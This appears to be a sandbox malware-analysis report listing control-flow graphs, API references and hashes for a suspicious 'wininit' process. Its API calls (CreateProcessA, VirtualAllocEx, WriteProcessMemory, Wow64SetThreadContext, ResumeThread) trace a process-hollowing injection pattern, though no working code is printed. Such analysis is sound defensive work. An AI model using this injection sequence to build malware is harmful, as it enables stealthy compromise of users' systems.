                                                  control_flow_graph 876 37e0f4-37e199 878 37e1e2-37e20a 876->878 879 37e19b-37e1b2 876->879 882 37e250-37e2a6 878->882 883 37e20c-37e220 878->883 879->878 884 37e1b4-37e1b9 879->884 892 37e2ec-37e3e3 CreateProcessA 882->892 893 37e2a8-37e2bc 882->893 883->882 894 37e222-37e227 883->894 885 37e1dc-37e1df 884->885 886 37e1bb-37e1c5 884->886 885->878 889 37e1c7 886->889 890 37e1c9-37e1d8 886->890 889->890 890->890 891 37e1da 890->891 891->885 912 37e3e5-37e3eb 892->912 913 37e3ec-37e4d1 892->913 893->892 901 37e2be-37e2c3 893->901 895 37e24a-37e24d 894->895 896 37e229-37e233 894->896 895->882 898 37e237-37e246 896->898 899 37e235 896->899 898->898 902 37e248 898->902 899->898 903 37e2e6-37e2e9 901->903 904 37e2c5-37e2cf 901->904 902->895 903->892 906 37e2d3-37e2e2 904->906 907 37e2d1 904->907 906->906 909 37e2e4 906->909 907->906 909->903 912->913 925 37e4d3-37e4d7 913->925 926 37e4e1-37e4e5 913->926 925->926 929 37e4d9 925->929 927 37e4e7-37e4eb 926->927 928 37e4f5-37e4f9 926->928 927->928 930 37e4ed 927->930 931 37e4fb-37e4ff 928->931 932 37e509-37e50d 928->932 929->926 930->928 931->932 933 37e501 931->933 934 37e543-37e54e 932->934 935 37e50f-37e538 932->935 933->932 938 37e54f 934->938 935->934 938->938
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E3C7
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: c5888719272b6d2e831ae0d469d98a919b8e6874f6c8e7f01865600f93965acc
                                                  • Instruction ID: b6ef413260fc5d635d5483f568859f450310f7f2ba22be580df574e0695e1220
                                                  • Opcode Fuzzy Hash: c5888719272b6d2e831ae0d469d98a919b8e6874f6c8e7f01865600f93965acc
                                                  • Instruction Fuzzy Hash: 87C12670D002298FDF25DFA4C841BEEBBB1BB49304F0095A9E859B7250DB789A85CF95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 940 37e100-37e199 942 37e1e2-37e20a 940->942 943 37e19b-37e1b2 940->943 946 37e250-37e2a6 942->946 947 37e20c-37e220 942->947 943->942 948 37e1b4-37e1b9 943->948 956 37e2ec-37e3e3 CreateProcessA 946->956 957 37e2a8-37e2bc 946->957 947->946 958 37e222-37e227 947->958 949 37e1dc-37e1df 948->949 950 37e1bb-37e1c5 948->950 949->942 953 37e1c7 950->953 954 37e1c9-37e1d8 950->954 953->954 954->954 955 37e1da 954->955 955->949 976 37e3e5-37e3eb 956->976 977 37e3ec-37e4d1 956->977 957->956 965 37e2be-37e2c3 957->965 959 37e24a-37e24d 958->959 960 37e229-37e233 958->960 959->946 962 37e237-37e246 960->962 963 37e235 960->963 962->962 966 37e248 962->966 963->962 967 37e2e6-37e2e9 965->967 968 37e2c5-37e2cf 965->968 966->959 967->956 970 37e2d3-37e2e2 968->970 971 37e2d1 968->971 970->970 973 37e2e4 970->973 971->970 973->967 976->977 989 37e4d3-37e4d7 977->989 990 37e4e1-37e4e5 977->990 989->990 993 37e4d9 989->993 991 37e4e7-37e4eb 990->991 992 37e4f5-37e4f9 990->992 991->992 994 37e4ed 991->994 995 37e4fb-37e4ff 992->995 996 37e509-37e50d 992->996 993->990 994->992 995->996 997 37e501 995->997 998 37e543-37e54e 996->998 999 37e50f-37e538 996->999 997->996 1002 37e54f 998->1002 999->998 1002->1002
                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0037E3C7
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 279f8877b8f1332bb3193c23905eca980688cf9ada6392b22e02baa7734a9390
                                                  • Instruction ID: 63fb9b9ec60946c6f6eaa8aa3f36d2d7bb35fd411fa6fc27d98913a6b892c02f
                                                  • Opcode Fuzzy Hash: 279f8877b8f1332bb3193c23905eca980688cf9ada6392b22e02baa7734a9390
                                                  • Instruction Fuzzy Hash: 21C10670D002298FDF25DFA4C845BEEBBB1BB49304F0095A9E819B7250DB749A85CF95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1004 37dd61-37ddd3 1006 37ddd5-37dde7 1004->1006 1007 37ddea-37de51 WriteProcessMemory 1004->1007 1006->1007 1009 37de53-37de59 1007->1009 1010 37de5a-37deac 1007->1010 1009->1010
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DE3B
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 2f6790add60b0f4911dabd643280a159d7ba12081b8f9a5a0dd69ec5d196f09e
                                                  • Instruction ID: 9c9dbf7ed0743fe4b61620b2606e0d7d82151346273f92ebd72d37e69c134d2e
                                                  • Opcode Fuzzy Hash: 2f6790add60b0f4911dabd643280a159d7ba12081b8f9a5a0dd69ec5d196f09e
                                                  • Instruction Fuzzy Hash: 3B41ADB4D012489FCF11CFA9D984AEEFBB1BF49314F24942AE815B7250C378AA45CF54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1015 37dd68-37ddd3 1017 37ddd5-37dde7 1015->1017 1018 37ddea-37de51 WriteProcessMemory 1015->1018 1017->1018 1020 37de53-37de59 1018->1020 1021 37de5a-37deac 1018->1021 1020->1021
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DE3B
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 975cac9f086aeca2798bbf2dfeb12a21f537a7812d7afb29b498c21cf7a15184
                                                  • Instruction ID: bb284b596aa0561ade0ca9bcff80b343d487eb61d718989db620b6651f6f0d3d
                                                  • Opcode Fuzzy Hash: 975cac9f086aeca2798bbf2dfeb12a21f537a7812d7afb29b498c21cf7a15184
                                                  • Instruction Fuzzy Hash: A641ADB4D012489FCF11CFA9D984AEEFBB1BF49310F20942AE815B7250D738AA45CF54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1026 37dec1-37df90 ReadProcessMemory 1029 37df92-37df98 1026->1029 1030 37df99-37dfeb 1026->1030 1029->1030
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DF7A
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: baf3a75522c3e7ac8003f8c3da58e49e90b2b19a0c805abbdeec29c68a5e814a
                                                  • Instruction ID: 24a699ec0f9efade7da0e8baa13aaf89c08527b52dcab667943b599f4c37f621
                                                  • Opcode Fuzzy Hash: baf3a75522c3e7ac8003f8c3da58e49e90b2b19a0c805abbdeec29c68a5e814a
                                                  • Instruction Fuzzy Hash: 7241ACB8D002589FCF10CFA9D884AEEFBB1BF59310F10942AE815B7250C779AA55CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1035 37dec8-37df90 ReadProcessMemory 1038 37df92-37df98 1035->1038 1039 37df99-37dfeb 1035->1039 1038->1039
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0037DF7A
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: cb0724729528876ea2811ac85165334a317db0f66346f3acb393b6a3d5d358ed
                                                  • Instruction ID: 7e07663d9570513397df3f69d89bc5f4f31d36e79cdc000d8f8be6e42c7fecdd
                                                  • Opcode Fuzzy Hash: cb0724729528876ea2811ac85165334a317db0f66346f3acb393b6a3d5d358ed
                                                  • Instruction Fuzzy Hash: 7D41BBB8D002589FCF10CFA9D884AEEFBB1BF49310F10902AE815B7200C734AA45CF65

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1044 37dc39-37dd00 VirtualAllocEx 1047 37dd02-37dd08 1044->1047 1048 37dd09-37dd53 1044->1048 1047->1048
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DCEA
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: d835a97c47cf0256e29035c4167bdaed8d113c94551511ab4adc09a1a32c71d8
                                                  • Instruction ID: c5db72dc7e22ab7f9056a67037de099064a583cc3fea2ea28382e9b222d43474
                                                  • Opcode Fuzzy Hash: d835a97c47cf0256e29035c4167bdaed8d113c94551511ab4adc09a1a32c71d8
                                                  • Instruction Fuzzy Hash: 6341A9B8D002489FCF10CFA9D884AEEFBB1BF49310F20942AE815BB210D775A945CF55

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1053 37dc40-37dd00 VirtualAllocEx 1056 37dd02-37dd08 1053->1056 1057 37dd09-37dd53 1053->1057 1056->1057
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0037DCEA
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 3856c510bf1caf97950f7adf2952bf10448b306fdacadbe62478e7e20f10c1a4
                                                  • Instruction ID: 909b783f93455b4b26f50480b243f061fe292bf104ffb944938155ce9ce101f7
                                                  • Opcode Fuzzy Hash: 3856c510bf1caf97950f7adf2952bf10448b306fdacadbe62478e7e20f10c1a4
                                                  • Instruction Fuzzy Hash: C74199B8D002589FCF10CFA9D984AAEFBB5BF49310F20942AE814BB210D775A955CF95

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1062 37db08-37db70 1065 37db87-37dbd5 Wow64SetThreadContext 1062->1065 1066 37db72-37db84 1062->1066 1068 37dbd7-37dbdd 1065->1068 1069 37dbde-37dc2a 1065->1069 1066->1065 1068->1069
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 0037DBBF
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: ce425295021dab596b8589c675f60f0ff52100f6a61cca54939f909fadfc1fba
                                                  • Instruction ID: e07498a6a6d2332555f7cdb5462d328f082bc2010c727b150822b26aa5aaecce
                                                  • Opcode Fuzzy Hash: ce425295021dab596b8589c675f60f0ff52100f6a61cca54939f909fadfc1fba
                                                  • Instruction Fuzzy Hash: 8041CFB4D002589FDB10DFA9D884AEEFBF1BF49314F24842AE818B7240D779AA45CF54
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 0037DBBF
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 493917f002f9f0ee624054d97418ac95619da0ebcad5e292d942eeb1cdb1abe0
                                                  • Instruction ID: 0740b70c34a831af3920c6746cfaff89d637af1d4073fee52f784933b091b872
                                                  • Opcode Fuzzy Hash: 493917f002f9f0ee624054d97418ac95619da0ebcad5e292d942eeb1cdb1abe0
                                                  • Instruction Fuzzy Hash: 2E41B0B4D002589FDB14DFA9D884AEEFBF1BF49314F24842AE818B7240D778AA45CF54
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 0037D666
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 93a716db1df70141196e1dd18e0a15c767e9a8325b98df024016a131408ac43f
                                                  • Instruction ID: 0db17dc3ef597fdb387c1cffcf566fddc5f66b8344f5f6cc303048e883291b53
                                                  • Opcode Fuzzy Hash: 93a716db1df70141196e1dd18e0a15c767e9a8325b98df024016a131408ac43f
                                                  • Instruction Fuzzy Hash: 0531CAB4D002089FCF14DFA9D884AEEFBB5AF89314F24801AE819B7340C738A905CF94
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 0037D666
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 881c65aa143d10c6aebb7140d678a6ca9c967f2152a627e7147f72a597a5ac69
                                                  • Instruction ID: 21919e6eee71f5b423364ffd2f261cfbfcf0781e451bba09b49a2747d229d5e6
                                                  • Opcode Fuzzy Hash: 881c65aa143d10c6aebb7140d678a6ca9c967f2152a627e7147f72a597a5ac69
                                                  • Instruction Fuzzy Hash: 0931BCB4D002189FCF14DFA9D884A9EFBB5BF89314F20941AE818B7340C735A945CF95
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (
                                                  • API String ID: 0-3887548279
                                                  • Opcode ID: f86841476993962d0e09059f9a1cd86c051475c12fc67a14fb1ba8393318b546
                                                  • Instruction ID: b9ef0cb217ed05abe073b1bb6fb8c96e974f4a189f28f59d3e46b7a17f964356
                                                  • Opcode Fuzzy Hash: f86841476993962d0e09059f9a1cd86c051475c12fc67a14fb1ba8393318b546
                                                  • Instruction Fuzzy Hash: 3EF0CF35A19228EFDB20CF94CA80BE8B7B8EB09314F149199D60DA7252D771AA81DF00
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c45a622673430b3c94504f5937840094010bf97954179493d34724a3126b4cf3
                                                  • Instruction ID: c4e12f2c2a306fddff0e4c12c34fedea3b1bf97f112f76d840a25a325d3ed16f
                                                  • Opcode Fuzzy Hash: c45a622673430b3c94504f5937840094010bf97954179493d34724a3126b4cf3
                                                  • Instruction Fuzzy Hash: 23416A71E6522AEFCB24CF50CD40BE8B7B5BF89300F1092A6D509B6141EBB06AC4DF40
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64082e449a47d00f43e081a2e0ad025444f1e4157dbb04f1baa6e29d715ba862
                                                  • Instruction ID: 7a74eaa95129280ea9c949b260fc84cc3f771c49a126114efe2c7f1dc7b2b14a
                                                  • Opcode Fuzzy Hash: 64082e449a47d00f43e081a2e0ad025444f1e4157dbb04f1baa6e29d715ba862
                                                  • Instruction Fuzzy Hash: E241E074E54229DFCB20CF14C980BECB7B5BB59304F1081EAD609A7291EBB06AC4DF40
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ff9c890f84827c24eb2892648a0a9a294f355a2d956894740b25f641da4d69f
                                                  • Instruction ID: d1a9d48e87b4f80a46b9940e5fcafb428f147365e65496ef0e54ba1c117dc950
                                                  • Opcode Fuzzy Hash: 7ff9c890f84827c24eb2892648a0a9a294f355a2d956894740b25f641da4d69f
                                                  • Instruction Fuzzy Hash: 8721B075604248EFEB05DF14E9C0B26BBB5EF84314F34C5A9E8494B282C336D947CA61
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 17d8f069ffb4db388d041fa8c61e63df72b20aae1a01659dbbfe3c221c30d268
                                                  • Instruction ID: 32294d08661681a6f7c5afb990ecea5863ffe76251080a11ad231ff6337f4e72
                                                  • Opcode Fuzzy Hash: 17d8f069ffb4db388d041fa8c61e63df72b20aae1a01659dbbfe3c221c30d268
                                                  • Instruction Fuzzy Hash: D521CF75604248DFDB14DF14E8C4B16BB75EF84314F34C5A9E80D4B286C33AD846CAA1
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92bf9aae31fae0b96899170fefdcb9a00e52639cb987b8f210bb289c296e4a08
                                                  • Instruction ID: 49898945a3d1c60c84132f71686d17dc4035ff22ad5ba2dd8d32ec79811f10bd
                                                  • Opcode Fuzzy Hash: 92bf9aae31fae0b96899170fefdcb9a00e52639cb987b8f210bb289c296e4a08
                                                  • Instruction Fuzzy Hash: 2D214834E19228DFCF64CFA4C980BEDBBB5AB49300F1490999509A7291E7756A85DF00
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad69c760fa5fc387b1cbfc2d2d398989e5cf2a715cc84ae81aa90ccb4c88888d
                                                  • Instruction ID: 1a2d80be148b02e1b401ead92d6ea3083cdc81613f5aa31682b165826e49a153
                                                  • Opcode Fuzzy Hash: ad69c760fa5fc387b1cbfc2d2d398989e5cf2a715cc84ae81aa90ccb4c88888d
                                                  • Instruction Fuzzy Hash: B3218B755093848FDB12CF24D994B15BF71EF46314F28C5EAD8498B2A7C33A984ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420241214.000000000017D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0017D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_17d000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                  • Instruction ID: 52c815ef28cb02b911deba5281035f990efd29d8bf1dbe06e3189aef2660295c
                                                  • Opcode Fuzzy Hash: b2bd6976026d354a6142bc6b35cb1794080d1e11c79b0ba0a28214b48a782f44
                                                  • Instruction Fuzzy Hash: 2C11BB75504284DFDB01CF14D5C4B15BFB1FF84314F28C6A9D8494B256C33AD84ACBA2
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7e157ce9c04d7ccd6839fe102bd43ef12e17cbbd8a953b7c0234a0522749b02d
                                                  • Instruction ID: f64b46a9072d917f68e629d4ea30b05a138630c69e4994f2f6412d6d8c697e15
                                                  • Opcode Fuzzy Hash: 7e157ce9c04d7ccd6839fe102bd43ef12e17cbbd8a953b7c0234a0522749b02d
                                                  • Instruction Fuzzy Hash: E0116038A19268DFDB24CF60C988BE8B7B0FB89305F1481DA840DAB291D7759BC5DF50
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d094935aeaec9b2115c18bdebdc6c11bdb6eb7020774098269218fb3238331cb
                                                  • Instruction ID: 1517374bc973db21acd9c5c7eaea1f77ef2176947a11f527762089c2729afb8e
                                                  • Opcode Fuzzy Hash: d094935aeaec9b2115c18bdebdc6c11bdb6eb7020774098269218fb3238331cb
                                                  • Instruction Fuzzy Hash: 7D01C0B5A142289FCB24DF64C981BDCB7F9AB4D300F10849AE60DA7241D775AA85CF44
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c02ade7ab6c7be5bb445ec8fb03f42c5d9f5444415cdf5185b7204e7d0800b5b
                                                  • Instruction ID: b18034d1f61fe96eac32d5f788cf3d92bcc922020c531eda407b9c0191cf3991
                                                  • Opcode Fuzzy Hash: c02ade7ab6c7be5bb445ec8fb03f42c5d9f5444415cdf5185b7204e7d0800b5b
                                                  • Instruction Fuzzy Hash: 59F01774E00219EFDB40DFB9CA405AEF7F5EF89300F1485A98818E3300E731AA41DB80
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12d17472ebc9029812d4fa15838df8fe32767a4735e80fee70bd159838305653
                                                  • Instruction ID: 2afa125f6c2dce826f685f8beb5494075510e91b94306f1c2d141505b1d10bfa
                                                  • Opcode Fuzzy Hash: 12d17472ebc9029812d4fa15838df8fe32767a4735e80fee70bd159838305653
                                                  • Instruction Fuzzy Hash: A6F06430A08228DFCB61CFA0C880BE9BBB1AF48300F2400EA9008A7291D7756AC5CF00
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d82c76a2126782e5a2f44c221e144e3dce797b941ffe77db55c9d3de446a53a
                                                  • Instruction ID: b9340c28a6e40aa40b8555591d9f593f01dedb66a01afe8a17230e056cb114c2
                                                  • Opcode Fuzzy Hash: 2d82c76a2126782e5a2f44c221e144e3dce797b941ffe77db55c9d3de446a53a
                                                  • Instruction Fuzzy Hash: 1EF03A78A11228CFDB24CF60CD54BD8B7B0BB85311F0481DA8819A7391D7749B86CF90
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c844e42a62768fc6e925e69c1d2fe726b5145802014809e1da6662eeb75e8829
                                                  • Instruction ID: abf8b67ac57c40c4a8bf2c05776c13495479caab615a0331e5629b4319d394c2
                                                  • Opcode Fuzzy Hash: c844e42a62768fc6e925e69c1d2fe726b5145802014809e1da6662eeb75e8829
                                                  • Instruction Fuzzy Hash: 39F0B275A45228DFDBA0CFA4C980BECBBB4FB49311F10809AD90DA7251D631AE85CF40
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cc45c54aaab2cf6ffda6efe591933e777546ea8df2d4ef15d9a48c0c0200d1b3
                                                  • Instruction ID: 13cd95bd98fe1dfb15bbcbcfbd4f040963e6cbd4999d1be183d7b4e0e3ba3579
                                                  • Opcode Fuzzy Hash: cc45c54aaab2cf6ffda6efe591933e777546ea8df2d4ef15d9a48c0c0200d1b3
                                                  • Instruction Fuzzy Hash: 04F08C34A25228CFDB50CF60CE84BF9FBB5AB49700F0080DA850EA7251D776AA81CF40
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.423521655.0000000004220000.00000040.00000800.00020000.00000000.sdmp, Offset: 04220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_4220000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 626fb820c4db3ad5218c2e00201aa1fad50391c827363a2bf35013143007dc16
                                                  • Instruction ID: bc853a7f1acdead280aaef66419c93d1a461c2a28472078ab577fa5306e5e137
                                                  • Opcode Fuzzy Hash: 626fb820c4db3ad5218c2e00201aa1fad50391c827363a2bf35013143007dc16
                                                  • Instruction Fuzzy Hash: 55E06D34A14128DFCB60CF20CA44BE8B7F4AB58300F48C0DA851CA3251DB74AE85DF10
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_16_2_370000_wininit.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Y>0
                                                  • API String ID: 0-1250427286
                                                  • Opcode ID: 975f12cd19c3882374c9719e153f546ff0cb4fe55b11ca2c16d1aca323d04cee
